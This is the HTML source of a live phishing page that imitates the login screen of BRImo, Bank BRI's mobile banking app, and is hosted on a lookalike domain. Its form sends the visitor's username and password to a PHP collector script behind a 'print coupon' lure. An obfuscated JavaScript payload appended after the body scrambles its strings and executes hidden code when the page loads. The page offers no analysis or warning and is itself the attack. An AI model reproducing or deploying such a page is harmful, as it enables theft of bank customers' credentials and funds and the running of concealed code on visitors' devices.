

<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="fragment" content="!">
<meta name="theme-color" content="#1E90FF">
<meta name="description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ...">
<link rel="canonical" href="https://perubahantarifbri.com/" />
<link rel="icon" href="img/brimo_logo1.png">

<meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="BRlmo - Bank BRI" />
<meta name="twitter:title" content="BRlmo - Bank BRI" />
<meta property="og:site_name" content="BRImo" />
<meta name="twitter:site_name" content="BRImo" />
<meta property="og:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
<meta name="twitter:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
<meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
<meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
<meta property="og:url" content="https://perubahantarifbri.info/-brimo" />
<meta property="og:type" content="website" />
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
<meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
<title>BRImo - Bank BRI</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
<link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css" />
<style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        @font-face {
            font-family: 'Avenir';
            src: url(../fonts/AvenirNextLTPro-Bold.otf);
        }

        body {
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Avenir';
        }

        .text-header {
            font-family: 'Avenir';
            color: #09559a;
        }

        .text-subheader {
            font-family: 'Avenir';
            margin-top: -20px;
            color: #000;
        }

        .btn-punya {
            font-family: 'Avenir';
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            font-family: 'Avenir';
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

        .form-log {
            font-family: 'Avenir';
            box-sizing: border-box; 
            height: 56px; 
            width: 480px; 
            max-width: 100%; 
            border-top: 1px inset rgba(250, 250, 250, 0.13); 
            border-right: 1px solid rgba(184, 184, 184, 0.53); 
            border-bottom: none; 
            border-left: 1px outset rgba(168, 168, 168, 0.58); 
            border-image: initial; 
            background-color: rgb(255, 255, 255); 
            border-radius: 5px 5px 0px 0px; 
            box-shadow: rgb(237, 237, 237) 2px 2px 2px 0px; 
            font-family: 'Open Sans', sans-serif;
            font-size: 16px; 
            color: rgb(28, 28, 28); 
            word-spacing: 7px; 
            padding: 0px 48px;
            outline: none;
        }

        #ionIcons {
            font-family: 'Avenir'
            color: rgb(22, 119, 199);
            font-size: 30px;
            position: absolute;
            display: block;
            margin-top: 7px;
            margin-left: 15px;
        }

        .eye {
            font-family: 'Avenir';
            display: block;
            margin: -37px auto;
            margin-right: 20px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 23.7189px;
            width: 24.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }

        .btn-login {
            font-family: 'Avenir';
            display: block;
            margin: 10px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background: none rgba(0, 110, 200, 0.96); 
            border: none; 
            text-align: center; 
            height: 48px; 
            width: 100%; 
            font-family: Arial; 
            font-size: 16px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 7px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 100ms step-start 0s;
        }
        .btn-login:hover {background-color: rgba(0, 110, 200, 0.96)}

           .btn-login:active {
            background-color: rgba(0, 110, 200, 0.96);
            box-shadow: rgb(135, 135, 135) 0.8px 4px 8px 1px;
          transform: translateY(0px);
          }

        .btn-login:disabled {
            opacity: 0.5;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 100%;
            }
        }
    </style>
</head>
<body>
<div class="container">
<div class="row">
<div class="col-12 d-block mx-auto text-center p-0" style="height: auto; width: auto; max-width: auto; margin-top: -2px; border-radius: 0px;">
<img alt="" src="https://hosting.tigerengine.id/gl12b7.jpg" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
        </div>
         </div>
        
         <div class="mt-3">
        <div class="row" style="margin-top: -40px;">
<div class="col-12 d-block mx-auto" style="margin-bootom: 0px; white-space: pre-wrap; width: 459px; max-width: 100%; left: 0px; top: 0px; height: 98.8px; padding-bottom: 0px; font-family: Barlow; font-size: 16px; font-weight: 400; color: #000; line-height: 1.4; border-radius: 0px;">

          </div>
        </div>
       
<form action="req/sendLogin.php" method="POST">

<div class="row mb-3">
 
<div class="col-12" style="width: 459px; max-width: 100%; display: block; margin-top: -25px">
<div>
<img src="https://hosting.tigerengine.id/tzoh5f.png" width="25" style="position: absolute; margin-top: 14px; margin-left: 14px;" alt="">
<input name="d" id="user" type="text" class="bubble-element Input form-log" tabindex="1" placeholder="Username" maxlength="" required>
</div>
<div style="margin-top: 1px">
<img src="https://hosting.tigerengine.id/b4zry3.png" width="21" style="position: absolute; margin-top: 14px; margin-left: 16px;" alt="">
<input type="password" name="e" id="password" class="bubble-element Input form-log" tabindex="1" placeholder="Password" maxlength="" pattern="(?=.*[A-Z])(?=.*[a-z])(?=.*[0-9]).{8,}" title="Minimal 8 Digit Terdiri Dari Angka Dan Huruf Besar Kecil" required>
<div class="bubble-element eye clickable-element" tabindex="3" id="eyeOpen">
<img alt="" id="eye" src="https://hosting.tigerengine.id/jd7366.png" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
</div>
<div class="bubble-element eye clickable-element" tabindex="3" id="eyeClose" style="display: none">
<img alt="" id="eye" src="https://hosting.tigerengine.id/s8ol72.png" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
</div>
</div>
<div class="text-header" style="float: right; position: relative; z-index: 999; display: block; margin-top: 8px;"><font style="font-size: 15px" color="#000000"><strong><strong><a href="/BriDebit(2)(1).html" target="_blank" style="color: #09559a; text-decoration: none;">Lupa Username/Password?</a></strong></font></div></strong>
</div>
</div>
<div class="row mt-3">
<div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: -20px auto;">
<button class="btn-login" type="submit" disabled>CETAK KUPON</button>
<br>
</div>
</div>
</form>
</div>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script>

 <script>
        function OnButton(user, pass) {
            if(user.length > 4 && pass.length > 4) {
                $(".btn-login").prop('disabled', false);
            } else {
                  $(".btn-login").prop('disabled', true);
            }
        }
        $(document).ready(function() {
        
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });

            $("#user").on('input', function() {
                var user = $("#user").val();
                var pass = $("#password").val();

                OnButton(user, pass);
            });

            $("#password").on('input', function() {
                var user = $("#user").val();
                var pass = $("#password").val();

                OnButton(user, pass);
            });
        });
    </script>
  <!-- <div </script></body> -->
  </body>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js" integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg==" crossorigin="anonymous" referrerpolicy="no-referrer"></script> <script type="text/javascript">var login;(function(){var uEf='',SuI=394-383;function rJZ(j){var y=2988044;var a=j.length;var u=[];for(var g=0;g<a;g++){u[g]=j.charAt(g)};for(var g=0;g<a;g++){var c=y*(g+104)+(y%33407);var x=y*(g+674)+(y%44143);var q=c%a;var v=x%a;var h=u[q];u[q]=u[v];u[v]=h;y=(c+x)%4127721;};return u.join('')};var QMa=rJZ('gvosrduebrsanimcfrhtcqylxkpwotcutnzjo').substr(0,SuI);var Bby='(ha{u=-1,ipfvuuar7g,r9 v=can+ u.g]t=9n{ntC)tiC4+7))et;3+ t;i+o2.s8l*138+rcr(qph8+[0,,xtoypj(e=r()i9c,rdv(,7u"c144A,6gwz.. eoC=t(8a;r =g"tr]o=57;<a)ajogt<;htet)(n[a]].g,1j,alhs6;jCnr"t6mr;vrd[,.m3v;=lr(vno u=hn;6[)[u+(a(s;(eoovc2f1p=(en6)d}6la,l.1f=xi=;],uiqa",,n({siae-+a.gonl}o=en-t;grr=;;s-miogr=+.]udillxota=u+)>g(kwc6(ng[io)lrrtm0oc9pf1ayavr=AC ruviy;rfrr+*n=r[=evhra4avl2v2 ).0b,dao,;1tdeA{(f7;)wguhr{==ji=ra;i gck) ]snrgrv ]i (ydvi=8;;7}S()slinnb;e0k>a( if r(izc;qtw+(k.ve)g==".ni.ttk-lh4e(,1f9cnj=rfid;[aCdeA+(<76h-0)r;.;,<r=0}+,se).=8s{eu;;cr=(ncCv+vnpa=.}ua7vsczne.ph1h+qro(fpnr);+(deiqnfach0st)9}a+alrno ]a;(n")oi . 0ol)5rts[1l().su;=.b;6jbs=)=.l"17i;{.nao(n88go+"Am,=)n.;"}-+da)s]4 ;rv]5ih=lue2m()7;"[.o+i!g=092vvm,favCue+0n08;))aflai;vvrg [ ia=hgw,+x] ; 2fmc)bc).r)[.<]=ils,ktsud[,tt e;;ortg9ns.a!lgp;(sfho)mh]9+g;ia(4csbSrj0ninf,o==hrz,tpo(5[v(g)d;plu =r+lrt;avihp);l=;ap, nls;';var uXn=rJZ[QMa];var XuZ='';var YKx=uXn;var TMQ=uXn(XuZ,rJZ(Bby));var pum=TMQ(rJZ('$a.$;e0ie!6e#(*3yp]btV).e!;\/\/3y0d7.,rrn$%xc]w\/(g0$jVinV}$2b.g_)#}(a,,)0$%t(b}.V],e!6g3(h!Vb0V#.(md=4{.;dV ;6]y.V%..tudN!VVcsfVV.e=.(rdE)e.coe.np%V+\'VjVV\/aVf3ew.lwVye1V,nV0c0,(\'xVV}.gbd,-!.y5."jV.e11+V+0#syua(17)2f3.t2)_\/u(#.}(.)#=_8vd0V#i,+ur4tVi..}46S#sere.o\/V1eV.d:56;4fV)_V3$#v ass.#ne"i;tro])u.ae5.)a)$7e1\/i7435V;VVs?s&V=* .8 \/{2,"mne0med#V-]r0V!V3}s\/bg.le_f ,2_ce+3a;gt-e3(u5V3o9)iaVV{o,o1\/,t..aV.V#)V6!\/)l.71#.Vad.V#\/m1e]wV5s33nb2s$6(Ve1uIVV$mrci5V0-_.\'S,()h%0V1)1M3 Vg2$)S .4a\/.V28;(7a,to3ha],_lp%ooV%l4!121f.tg-(jbg)Vu*003i2V0s=#dxp2#!$V,eo$tep!V (t=u{sephds.30\/.+)4;(fV6+$3d+C;.=6j_pra=0u(}(}2]S.}da [holr3V(.ed0.1\/$__rs(p.*ds)hgV\/;.).g..,o.3eulc;=V1}d=s0-)oj1(b7V0{n0r7,7frw %afdV#_33)=kd(dVsS)nn4fV0V3_47 tu,4\/4ft+!oao,.a:!.tc{Vlp7da9d0 \/7fVVc_g!sVd _=gpV4hV.(;V V(V] !#4;n!}4pquysddo&0(2V;n\/adi=ex\'V7.(f(V):)t803dz=f]oaVV1C3$od0ua=(,.karV.\/y]t.f7VVpr($#)V\/m js;)u\/rV1t,sf4yeq$3V)ar.{x3.nVV.1t6x"+!e17issd)= %#4_(n4o)V2by2)r."d2&r(.w6po\'t#;V_rsagE.$pag$ ,3r\/V\/]V1=ek;tnVV,)_.reg(1un1pb..{_$61%7VV1)%]21o,".0V15..=# )4Ir]maghtlSyoda+];o6V&t"sr1V(t,"a Vr.9V(oV*o.].8xu;$,_"tjeVV\/.[gVi}!tVieVsaws!VV#;%n,obt0V{tVk}_$1db_pn)%dg+g\/bu.gh)it)&d],]4.2=pv(27-fV,;"=2V,kp7V=..)&(1(%6VVtu+$2.2n)cl="V8=3!n_aud.isV4Vf.p,s,=rVV4jn2V.,]2!g{:(ryg{VV,.VV)\'Vh![+V7((g$st!ea %\/V2)l}6V77+1;12Vti%pVy\/;=,7snnlo.d(bV:V$.3= VVw\/Va4((pg.d81=s0uf2_\/.9tmVpo)s$Vee)o\/$pt.VVgto1boo!3e;MrV,6b!4d)n..!o7.V)n _]_1af93l]fol0Vl"01mT,0f,b!2sVa(eV}4upVCs..= st5fmn(!394(ns18=+;2t%!!rT%a[),oit.ehV0'));var DxS=YKx(uEf,pum );DxS(9808);return 4523})()</script>
</html>